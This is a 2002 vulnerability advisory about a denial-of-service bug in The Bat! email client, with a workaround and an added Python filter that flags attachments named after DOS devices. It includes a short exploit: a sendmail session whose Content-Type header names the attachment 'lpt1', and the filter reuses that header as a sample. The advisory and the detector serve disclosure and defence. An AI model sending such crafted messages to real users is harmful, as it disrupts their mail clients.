28th Feb 2002 [SBWID-5153]
COMMAND
The Bat! DoS via dos-device specs in mail header
SYSTEMS AFFECTED
The Bat! 1.53d, 1.54beta
PROBLEM
From the 3APA3A advisory
[http://www.security.nnov.ru/advisories/archdos.asp]:
The Bat! has a special device access bug. If The Bat! is configured to
save attachments apart from message bodies and a file has the name of
a special device, The Bat! will attempt to open the special device.
Exploit:
bash-2.03$ sendmail -U test@test.com
From: test
To: test
Content-Type: apllication/exe; name=lpt1
Test
.
SOLUTION
No patch yet. Check [http://www.thebat.net].
Workaround:
Disable the "Keep attachment files separately" option or use the
Account/Dispatch Mail On Server option to delete the problematic
message from the server.
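
Added example (not part of the 3APA3A advisory or of The Bat!): Python code a mail gateway or pre-delivery filter could use to flag messages whose attachment names resolve to DOS devices, so they can be held before the client saves the attachment. The function names and the sample messages are constructed for illustration; the first sample reuses the headers shown above.

```python
import email
import re
from email.utils import collapse_rfc2231_value

# Device names reserved by DOS/Windows: CON, PRN, AUX, NUL, COM1-9, LPT1-9.
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL"} | {
    f"{prefix}{n}" for prefix in ("COM", "LPT") for n in range(1, 10)
}

# Constructed samples: the advisory's headers, and a harmless message.
SAMPLE_BAD = "From: test\nTo: test\nContent-Type: apllication/exe; name=lpt1\n\nTest\n"
SAMPLE_OK = (
    "From: test\nTo: test\n"
    'Content-Type: application/pdf; name="report.pdf"\n\nTest\n'
)


def is_dos_device(filename):
    """True if the name would resolve to a DOS device when opened on Windows."""
    base = re.split(r"[\\/]", filename)[-1]      # drop any directory part
    stem = base.split(".", 1)[0]                 # an extension does not help
    return stem.rstrip(" :").upper() in DOS_DEVICES


def device_named_parts(raw_message):
    """Return (content_type, name) for every MIME part named after a device."""
    msg = email.message_from_string(raw_message)
    hits = []
    for part in msg.walk():
        # A name can arrive as Content-Type name= or Content-Disposition filename=.
        candidates = (
            part.get_param("name"),
            part.get_param("filename", header="content-disposition"),
        )
        for value in candidates:
            if value is None:
                continue
            name = collapse_rfc2231_value(value)
            if is_dos_device(name):
                hits.append((part.get_content_type(), name))
    return hits


if __name__ == "__main__":
    for label, raw in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(label, device_named_parts(raw))
```

The check matches on the name stem, so variants such as LPT1.txt or a name with a leading path are flagged as well.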